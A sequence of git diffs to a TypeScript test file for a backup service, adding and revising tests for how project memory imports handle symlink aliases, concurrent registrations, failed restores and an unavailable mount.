+    expect(importedTo).toEqual([]);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "failed",
+        message: expect.stringContaining("registration was kept") as string,
+      });
+    }
+  });
+
   test("refuses an import into a project that a matched entry restores in the same run", async () => {
     const target = path.join(tempDir, "target");
     await fs.mkdir(target);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1496,7 +1496,7 @@ describe("BackupService project imports", () => {
   test("announces restored and imported project memory to the memory notifier", async () => {
     const target = path.join(tempDir, "imported");
     await fs.mkdir(target);
-    const notified: Array<{ projectPath: string; relPaths: readonly string[] }> = [];
+    const notified: string[] = [];
     const service = createService(tempDir, {
       payload: createPayload({
         validateRestore: () =>
@@ -1532,8 +1532,8 @@ describe("BackupService project imports", () => {
       create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
     });
     service.setMemoryNotifier({
-      notifyExternalProjectChange: (projectPath, relPaths) => {
-        notified.push({ projectPath, relPaths });
+      notifyExternalProjectChange: (projectPath) => {
+        notified.push(projectPath);
       },
     });
 
@@ -1543,15 +1543,57 @@ describe("BackupService project imports", () => {
     );
 
     expect(result.success).toBe(true);
-    // Scope-relative paths, as a project memory store addresses them.
-    expect(notified).toEqual([
-      { projectPath: "/home/dev/src/matched", relPaths: ["deep/notes.md"] },
-      { projectPath: target, relPaths: ["todo.md"] },
-    ]);
+    // One event per project, not per file.
+    expect(notified).toEqual(["/home/dev/src/matched", target]);
+  });
+
+  test("records the restored commit before running imports so their results survive", async () => {
+    const target = path.join(tempDir, "imported");
+    await fs.mkdir(target);
+    const events: string[] = [];
+    const config = new TestBackupConfig(tempDir);
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() => {
+              events.push(`import:${config.state.settingsBackup?.lastRestoredCommit ?? "none"}`);
+              return Promise.resolve({
+                writtenFiles: ["memory/project/alpha-abc/notes.md"],
+                skippedFiles: [],
+              });
+            })
+          ),
+      }),
+    });
+    service.setProjectService({
+      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
+    });
+    expect((await service.saveSettings({ ...SETTINGS, includeProjects: true })).success).toBe(true);
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]?.status).toBe("imported");
+    }
+    // The commit was already persisted when the import ran: no config write can fail
+    // afterwards and discard the import results, which the snapshot cannot undo.
+    expect(events).toEqual(["import:remote-commit"]);
   });
 
   test("announces memory a failed matched restore already wrote", async () => {
-    const notified: Array<{ projectPath: string; relPaths: readonly string[] }> = [];
+    const notified: string[] = [];
     const service = createService(tempDir, {
       payload: createPayload({
         validateRestore: () =>
@@ -1569,8 +1611,8 @@ describe("BackupService project imports", () => {
       }),
     });
     service.setMemoryNotifier({
-      notifyExternalProjectChange: (projectPath, relPaths) => {
-        notified.push({ projectPath, relPaths });
+      notifyExternalProjectChange: (projectPath) => {
+        notified.push(projectPath);
       },
     });
 
@@ -1582,7 +1624,7 @@ describe("BackupService project imports", () => {
       expect(result.error.snapshotPath).toBeDefined();
     }
     // Disk changed for alpha even though the restore failed on beta.
-    expect(notified).toEqual([{ projectPath: "/home/dev/src/alpha", relPaths: ["notes.md"] }]);
+    expect(notified).toEqual(["/home/dev/src/alpha"]);
   });
 
   test("keeps the restore half of a preview when the export half fails", async () => {

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1634,6 +1634,60 @@ describe("BackupService project imports", () => {
     expect(registrations).toBe(1);
   });
 
+  test("imports into a project registered through another alias after planning", async () => {
+    const realParent = path.join(tempDir, "real");
+    await fs.mkdir(path.join(realParent, "repo"), { recursive: true });
+    const aliasA = path.join(tempDir, "alias-a");
+    const aliasB = path.join(tempDir, "alias-b");
+    await fs.symlink(realParent, aliasA, "dir");
+    await fs.symlink(realParent, aliasB, "dir");
+    const registeredAlias = path.join(aliasA, "repo");
+    const config = new TestBackupConfig(tempDir);
+    const importedTo: string[] = [];
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        // Nothing was registered when planning ran; another window then adds the same
+        // checkout through a different symlinked spelling before the imports execute.
+        writeSafetySnapshot: () => {
+          config.state.projects.set(registeredAlias, { workspaces: [] });
+          return Promise.resolve();
+        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    // create() checks only the target spelling and its canonical path, so it would register
+    // the second alias and split the project identity; the service must not ask it to.
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: path.join(aliasB, "repo") }] }
+    );
+
+    expect(result.success).toBe(true);
+    expect(registrations).toBe(0);
+    expect(importedTo).toEqual([registeredAlias]);
+  });
+
   test("refuses an import into a project that a matched entry restores in the same run", async () => {
     const target = path.join(tempDir, "target");
     await fs.mkdir(target);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -13,6 +13,7 @@ import {
 } from "./payload";
 import {
   BackupService,
+  type BackupMatchedProject,
   type BackupProjectImporter,
   type BackupProjectRegistrar,
   BackupServiceError,
@@ -94,7 +95,7 @@ function createPayload(overrides: Partial<BackupPayloadStore> = {}): BackupPaylo
         projectBundleSkipped: false,
       }),
     validateRestore: () =>
-      Promise.resolve({ hasProjectBundle: false, projectImports: [], matchedProjectPaths: [] }),
+      Promise.resolve({ hasProjectBundle: false, projectImports: [], matchedProjects: [] }),
     writeSafetySnapshot: () => Promise.resolve(),
     restore: () =>
       Promise.resolve({
@@ -115,6 +116,15 @@ function importsWith(
     Promise.resolve()
 ): BackupProjectImporter {
   return { assertProjectMemoryAllowed, importProjectMemory };
+}
+
+/** The validated identity of an entry registered at its own recorded path. */
+function matchedIdentity(projectPath: string): BackupMatchedProject {
+  return {
+    sourcePath: projectPath,
+    projectPath,
+    localMemoryDir: `${path.basename(projectPath)}-abc`,
+  };
 }
 
 /** A registrar mock around the given create(). */
@@ -156,7 +166,7 @@ describe("BackupService", () => {
           return Promise.resolve({
             hasProjectBundle: false,
             projectImports: [],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           });
         },
         writeSafetySnapshot: async (snapshotRoot) => {
@@ -570,7 +580,7 @@ describe("BackupService", () => {
           return Promise.resolve({
             hasProjectBundle: false,
             projectImports: [],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           });
         },
         restore: (options) => {
@@ -1026,7 +1036,7 @@ describe("BackupService", () => {
             ? Promise.resolve({
                 hasProjectBundle: false,
                 projectImports: [],
-                matchedProjectPaths: [],
+                matchedProjects: [],
               })
             : Promise.reject(new BackupCommandApprovalRequiredError(approvals));
         },
@@ -1118,7 +1128,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [fresh],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         writeSafetySnapshot: () => {
           snapshots += 1;
@@ -1149,7 +1159,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         writeSafetySnapshot: () => {
           snapshots += 1;
@@ -1188,7 +1198,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: candidates,
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1261,7 +1271,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1304,7 +1314,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1346,7 +1356,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [approved, skipped],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
       }),
     });
@@ -1378,7 +1388,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1431,7 +1441,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1476,7 +1486,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1524,7 +1534,7 @@ describe("BackupService project imports", () => {
               candidate({ name: "Rocket Science" }),
               candidate({ name: "Probe", token: "probe-token", sourcePath: "/src/probe" }),
             ],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
       }),
     });
@@ -1562,7 +1572,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [failing],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
       }),
     });
@@ -1594,7 +1604,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         // Another window unregisters the project while the snapshot is being written —
         // after planning resolved the target as already registered.
@@ -1638,7 +1648,7 @@ describe("BackupService project imports", () => {
             Promise.resolve({
               hasProjectBundle: true,
               projectImports: [candidate()],
-              matchedProjectPaths: [],
+              matchedProjects: [],
             }),
         }),
       });
@@ -1677,7 +1687,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate(), candidate({ name: "beta", token: "beta-token" })],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         writeSafetySnapshot: () => {
           snapshots += 1;
@@ -1714,7 +1724,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1751,7 +1761,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1789,7 +1799,7 @@ describe("BackupService project imports", () => {
   });
 
   test("carries the validated match set and the snapshot path into the restore", async () => {
-    const seen: Array<{ snapshotPath: string; matched: readonly string[] }> = [];
+    const seen: Array<{ snapshotPath: string; matched: readonly BackupMatchedProject[] }> = [];
     const snapshot = { root: null as string | null };
     const service = createService(tempDir, {
       payload: createPayload({
@@ -1797,14 +1807,14 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [],
-            matchedProjectPaths: ["/home/dev/src/alpha"],
+            matchedProjects: [matchedIdentity("/home/dev/src/alpha")],
           }),
         writeSafetySnapshot: (root) => {
           snapshot.root = root;
           return Promise.resolve();
         },
         restore: (options) => {
-          seen.push({ snapshotPath: options.snapshotPath, matched: options.matchedProjectPaths });
+          seen.push({ snapshotPath: options.snapshotPath, matched: options.matchedProjects });
           return Promise.resolve({
             changedFiles: [],
             localOnlyFiles: [],
@@ -1820,7 +1830,9 @@ describe("BackupService project imports", () => {
     // therefore the snapshot) covered, into the same snapshot directory.
     const snapshotRoot = snapshot.root;
     if (snapshotRoot === null) throw new Error("Expected the safety snapshot to be written");
-    expect(seen).toEqual([{ snapshotPath: snapshotRoot, matched: ["/home/dev/src/alpha"] }]);
+    expect(seen).toEqual([
+      { snapshotPath: snapshotRoot, matched: [matchedIdentity("/home/dev/src/alpha")] },
+    ]);
   });
 
   test("announces restored and imported project memory to the memory notifier", async () => {
@@ -1833,7 +1845,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: ["/home/dev/src/matched"],
+            matchedProjects: [matchedIdentity("/home/dev/src/matched")],
           }),
         restore: () =>
           Promise.resolve({
@@ -1889,7 +1901,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [candidate()],
-            matchedProjectPaths: [],
+            matchedProjects: [],
           }),
         prepareProjectImports: () =>
           Promise.resolve(
@@ -1932,7 +1944,7 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [],
-            matchedProjectPaths: ["/home/dev/src/alpha"],
+            matchedProjects: [matchedIdentity("/home/dev/src/alpha")],
           }),
         restore: () =>
           Promise.resolve({
@@ -1973,7 +1985,10 @@ describe("BackupService project imports", () => {
           Promise.resolve({
             hasProjectBundle: true,
             projectImports: [],
-            matchedProjectPaths: ["/home/dev/src/alpha", "/home/dev/src/beta"],
+            matchedProjects: [
+              matchedIdentity("/home/dev/src/alpha"),
+              matchedIdentity("/home/dev/src/beta"),
+            ],
           }),
         restore: () =>
           Promise.reject(

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1412,6 +1412,82 @@ describe("BackupService project imports", () => {
     expect(registrations).toBe(0);
   });
 
+  test("preflights an alias target against the registered project it imports into", async () => {
+    const realParent = path.join(tempDir, "real");
+    const registered = path.join(realParent, "proj");
+    await fs.mkdir(registered, { recursive: true });
+    const aliasParent = path.join(tempDir, "alias");
+    await fs.symlink(realParent, aliasParent, "dir");
+    const aliasTarget = path.join(aliasParent, "proj");
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(registered, { workspaces: [] });
+    const preflighted: string[] = [];
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(
+              () => Promise.resolve({ writtenFiles: [], skippedFiles: [] }),
+              (options) => {
+                preflighted.push(options.targetPath);
+                return Promise.resolve();
+              }
+            )
+          ),
+      }),
+    });
+    service.setProjectService({
+      create: () => Promise.resolve(Err("Project already exists")),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: aliasTarget }] }
+    );
+
+    expect(result.success).toBe(true);
+    // The memory scope actually written is the registered project's, not the alias's.
+    expect(preflighted).toEqual([registered]);
+  });
+
+  test("keeps a candidate on offer when its import fails per-candidate", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const failing = candidate();
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [failing],
+            matchedProjectPaths: [],
+          }),
+      }),
+    });
+    service.setProjectService({
+      create: () => Promise.resolve(Err("registration failed")),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]?.status).toBe("failed");
+      // Retryable without another preview: the token is still current.
+      expect(result.data.unapprovedProjectImports).toEqual([failing]);
+    }
+  });
+
   test("refuses two imports whose targets are aliases of one directory", async () => {
     const realParent = path.join(tempDir, "real");
     const target = path.join(realParent, "proj");

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -6,7 +6,11 @@ import type { BackupProjectImport, SettingsBackupInput } from "@/common/orpc/sch
 import { Err, Ok } from "@/common/types/result";
 import { BackupNonFastForwardError, backupCachePath, isBackupCacheName } from "./gitRepo";
 import { BackupRemoteUnreachableError } from "./credentials";
-import { BackupCommandApprovalRequiredError, ProjectMemoryWriteError } from "./payload";
+import {
+  BackupCommandApprovalRequiredError,
+  ProjectMemoryRestoreError,
+  ProjectMemoryWriteError,
+} from "./payload";
 import {
   BackupService,
   BackupServiceError,
@@ -1474,6 +1478,41 @@ describe("BackupService project imports", () => {
       { projectPath: "/home/dev/src/matched", relPaths: ["deep/notes.md"] },
       { projectPath: target, relPaths: ["todo.md"] },
     ]);
+  });
+
+  test("announces memory a failed matched restore already wrote", async () => {
+    const notified: Array<{ projectPath: string; relPaths: readonly string[] }> = [];
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [],
+            matchedProjectPaths: ["/home/dev/src/alpha", "/home/dev/src/beta"],
+          }),
+        restore: () =>
+          Promise.reject(
+            new ProjectMemoryRestoreError("EIO: disk fault", [
+              { projectPath: "/home/dev/src/alpha", files: ["memory/project/alpha-abc/notes.md"] },
+            ])
+          ),
+      }),
+    });
+    service.setMemoryNotifier({
+      notifyExternalProjectChange: (projectPath, relPaths) => {
+        notified.push({ projectPath, relPaths });
+      },
+    });
+
+    const result = await service.restore({ ...SETTINGS, includeProjects: true });
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("disk fault");
+      expect(result.error.snapshotPath).toBeDefined();
+    }
+    // Disk changed for alpha even though the restore failed on beta.
+    expect(notified).toEqual([{ projectPath: "/home/dev/src/alpha", relPaths: ["notes.md"] }]);
   });
 
   test("keeps a concurrently saved project-backup toggle when recording a commit", async () => {

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -79,10 +79,18 @@ function createPayload(overrides: Partial<BackupPayloadStore> = {}): BackupPaylo
   return {
     exportTo: () => Promise.resolve({ redactions: [], secretFiles: [], secretApproval: "" }),
     previewRestore: () =>
-      Promise.resolve({ changes: [], localOnlyFiles: [], commandApprovals: [] }),
-    validateRestore: () => Promise.resolve(),
+      Promise.resolve({
+        changes: [],
+        localOnlyFiles: [],
+        commandApprovals: [],
+        projectImports: [],
+        projectBundleSkipped: false,
+      }),
+    validateRestore: () => Promise.resolve({ hasProjectBundle: false, projectImports: [] }),
     writeSafetySnapshot: () => Promise.resolve(),
-    restore: () => Promise.resolve({ changedFiles: [], localOnlyFiles: [] }),
+    restore: () =>
+      Promise.resolve({ changedFiles: [], localOnlyFiles: [], projectBundleSkipped: false }),
+    importProjectMemory: () => Promise.resolve({ writtenFiles: [], skippedFiles: [] }),
     ...overrides,
   };
 }
@@ -117,7 +125,7 @@ describe("BackupService", () => {
       payload: createPayload({
         validateRestore: () => {
           events.push("validate");
-          return Promise.resolve();
+          return Promise.resolve({ hasProjectBundle: false, projectImports: [] });
         },
         writeSafetySnapshot: async (snapshotRoot) => {
           events.push("snapshot");
@@ -128,6 +136,7 @@ describe("BackupService", () => {
           return Promise.resolve({
             changedFiles: ["AGENTS.md"],
             localOnlyFiles: ["skills/local/SKILL.md"],
+            projectBundleSkipped: false,
           });
         },
       }),
@@ -316,7 +325,13 @@ describe("BackupService", () => {
         previewRestore: async () => {
           activeEntered?.();
           await activeHeld;
-          return { changes: [], localOnlyFiles: [], commandApprovals: [] };
+          return {
+            changes: [],
+            localOnlyFiles: [],
+            commandApprovals: [],
+            projectImports: [],
+            projectBundleSkipped: false,
+          };
         },
       }),
     });
@@ -357,7 +372,7 @@ describe("BackupService", () => {
           restoreEntered?.();
           await restoreHeld;
           events.push("restore-end");
-          return { changedFiles: ["AGENTS.md"], localOnlyFiles: [] };
+          return { changedFiles: ["AGENTS.md"], localOnlyFiles: [], projectBundleSkipped: false };
         },
         exportTo: () => {
           events.push("export");
@@ -468,6 +483,8 @@ describe("BackupService", () => {
             changes: [{ path: "preferences.json", status: "M" }],
             localOnlyFiles: [],
             commandApprovals: [],
+            projectImports: [],
+            projectBundleSkipped: false,
           });
         },
         exportTo: () => {
@@ -498,7 +515,13 @@ describe("BackupService", () => {
       payload: createPayload({
         previewRestore: (options) => {
           recordManagedPath(options);
-          return Promise.resolve({ changes: [], localOnlyFiles: [], commandApprovals: [] });
+          return Promise.resolve({
+            changes: [],
+            localOnlyFiles: [],
+            commandApprovals: [],
+            projectImports: [],
+            projectBundleSkipped: false,
+          });
         },
         exportTo: (options) => {
           recordManagedPath(options);
@@ -506,11 +529,11 @@ describe("BackupService", () => {
         },
         validateRestore: (options) => {
           recordManagedPath(options);
-          return Promise.resolve();
+          return Promise.resolve({ hasProjectBundle: false, projectImports: [] });
         },
         restore: (options) => {
           recordManagedPath(options);
-          return Promise.resolve({ changedFiles: [], localOnlyFiles: [] });
+          return Promise.resolve({ changedFiles: [], localOnlyFiles: [], projectBundleSkipped: false });
         },
       }),
     });
@@ -953,7 +976,7 @@ describe("BackupService", () => {
           const tokens = [...(approvedCommandTokens ?? [])];
           seenTokens.push(tokens);
           return tokens.includes("approved-token")
-            ? Promise.resolve()
+            ? Promise.resolve({ hasProjectBundle: false, projectImports: [] })
             : Promise.reject(new BackupCommandApprovalRequiredError(approvals));
         },
       }),

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1595,6 +1595,103 @@ describe("BackupService project imports", () => {
     }
   });
 
+  test("keeps a candidate on offer when its import skipped conflicting files", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const conflicted = candidate();
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [conflicted],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() =>
+              Promise.resolve({
+                writtenFiles: ["memory/project/target-abc/notes.md"],
+                skippedFiles: ["memory/project/target-abc/conflict.md"],
+              })
+            )
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })))
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]?.status).toBe("imported");
+      // No origin was recorded over the conflict, so the source is still an import
+      // candidate; the card must stay so the user can resolve and retry without a preview.
+      expect(result.data.unapprovedProjectImports).toEqual([conflicted]);
+    }
+  });
+
+  test("refuses an import whose source became a registered project since the preview", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const config = new TestBackupConfig(tempDir);
+    const reclassified = candidate();
+    const importedTo: string[] = [];
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [reclassified],
+            matchedProjects: [],
+          }),
+        // Another window registers the entry's recorded source path itself while the
+        // snapshot is written: the entry is an exact match from now on.
+        writeSafetySnapshot: () => {
+          config.state.projects.set(reclassified.sourcePath, { workspaces: [] });
+          return Promise.resolve();
+        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    // Neither registered nor written: memory imported into the target would be orphaned
+    // there once every later restore writes the entry into its own registered project.
+    expect(registrations).toBe(0);
+    expect(importedTo).toEqual([]);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "failed",
+        message: expect.stringContaining("registered on this machine since the preview") as string,
+      });
+    }
+  });
+
   test("re-registers a target whose planned registration vanished before the import", async () => {
     const target = path.join(tempDir, "target");
     await fs.mkdir(target);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -2092,6 +2092,69 @@ describe("BackupService project imports", () => {
     expect(snapshots).toBe(0);
   });
 
+  test("still resolves a registered alias of the target behind a project on an unavailable mount", async () => {
+    const realParent = path.join(tempDir, "real");
+    await fs.mkdir(path.join(realParent, "repo"), { recursive: true });
+    const aliasA = path.join(tempDir, "alias-a");
+    const aliasB = path.join(tempDir, "alias-b");
+    await fs.symlink(realParent, aliasA, "dir");
+    await fs.symlink(realParent, aliasB, "dir");
+    const registeredAlias = path.join(aliasA, "repo");
+    const unavailable = path.join(tempDir, "unavailable-mount");
+    const config = new TestBackupConfig(tempDir);
+    // Probed first, in registration order, at planning and again at execution.
+    config.state.projects.set(unavailable, { workspaces: [] });
+    config.state.projects.set(registeredAlias, { workspaces: [] });
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() => Promise.resolve({ writtenFiles: [], skippedFiles: [] }))
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+    const realRealpath = fs.realpath.bind(fs);
+    const realpath = spyOn(fs, "realpath").mockImplementation(((target: string) =>
+      // A mount that never answers: the probe pins its worker for good.
+      target === unavailable
+        ? new Promise<string>(() => undefined)
+        : realRealpath(target)) as unknown as typeof fs.realpath);
+    try {
+      const result = await service.restore(
+        { ...SETTINGS, includeProjects: true },
+        { projectImports: [{ token: "candidate-token", targetPath: path.join(aliasB, "repo") }] }
+      );
+      expect(result.success).toBe(true);
+      // Given the whole pass, the unavailable project would have left the alias unprobed
+      // at planning and again at execution, and the target would have been registered as
+      // a second spelling of the same directory. With its share only, the alias resolves
+      // and the import goes into the registered project.
+      expect(registrations).toBe(0);
+      if (result.success) {
+        expect(result.data.projectImportResults[0]).toMatchObject({
+          status: "imported",
+          targetPath: registeredAlias,
+        });
+      }
+    } finally {
+      realpath.mockRestore();
+    }
+  }, 20_000);
+
   test("refuses an import into a directory at another backed-up project's recorded path", async () => {
     // Local directories at two other entries' recorded paths: one still on offer, one matched.
     const otherCandidatePath = path.join(tempDir, "beta");

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -117,12 +117,9 @@ function importsWith(
   return { assertProjectMemoryAllowed, importProjectMemory };
 }
 
-/** A registrar mock: the given create() plus a no-op display-name setter unless overridden. */
-function registrar(
-  create: BackupProjectRegistrar["create"],
-  setDisplayName: BackupProjectRegistrar["setDisplayName"] = () => Promise.resolve()
-): BackupProjectRegistrar {
-  return { create, setDisplayName };
+/** A registrar mock around the given create(). */
+function registrar(create: BackupProjectRegistrar["create"]): BackupProjectRegistrar {
+  return { create };
 }
 
 function createService(
@@ -1516,7 +1513,7 @@ describe("BackupService project imports", () => {
     await fs.mkdir(existing);
     const config = new TestBackupConfig(tempDir);
     config.state.projects.set(existing, { workspaces: [], displayName: "Local name" });
-    const named: Array<[string, string]> = [];
+    const created: Array<[string, string | undefined]> = [];
     const service = createService(tempDir, {
       config,
       payload: createPayload({
@@ -1532,18 +1529,10 @@ describe("BackupService project imports", () => {
       }),
     });
     service.setProjectService(
-      registrar(
-        (projectPath) =>
-          Promise.resolve(
-            projectPath === existing
-              ? Err("Project already exists")
-              : Ok({ normalizedPath: projectPath })
-          ),
-        (projectPath, displayName) => {
-          named.push([projectPath, displayName]);
-          return Promise.resolve();
-        }
-      )
+      registrar((projectPath, options) => {
+        created.push([projectPath, options?.displayName]);
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
     );
 
     const result = await service.restore(
@@ -1557,9 +1546,10 @@ describe("BackupService project imports", () => {
     );
 
     expect(result.success).toBe(true);
-    // "checkout" would otherwise show up under its basename, not the name it was backed
-    // up with; the already registered project keeps its local name.
-    expect(named).toEqual([[fresh, "Rocket Science"]]);
+    // "checkout" would otherwise show up under its basename, not the name it was backed up
+    // with — set in the registration itself. The already registered project is never
+    // re-created, so its local name is untouched.
+    expect(created).toEqual([[fresh, "Rocket Science"]]);
   });
 
   test("keeps a candidate on offer when its import fails per-candidate", async () => {

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -2,7 +2,8 @@ import { afterEach, beforeEach, describe, expect, spyOn, test } from "bun:test";
 import * as fs from "node:fs/promises";
 import * as os from "node:os";
 import * as path from "node:path";
-import type { SettingsBackupInput } from "@/common/orpc/schemas/backup";
+import type { BackupProjectImport, SettingsBackupInput } from "@/common/orpc/schemas/backup";
+import { Err, Ok } from "@/common/types/result";
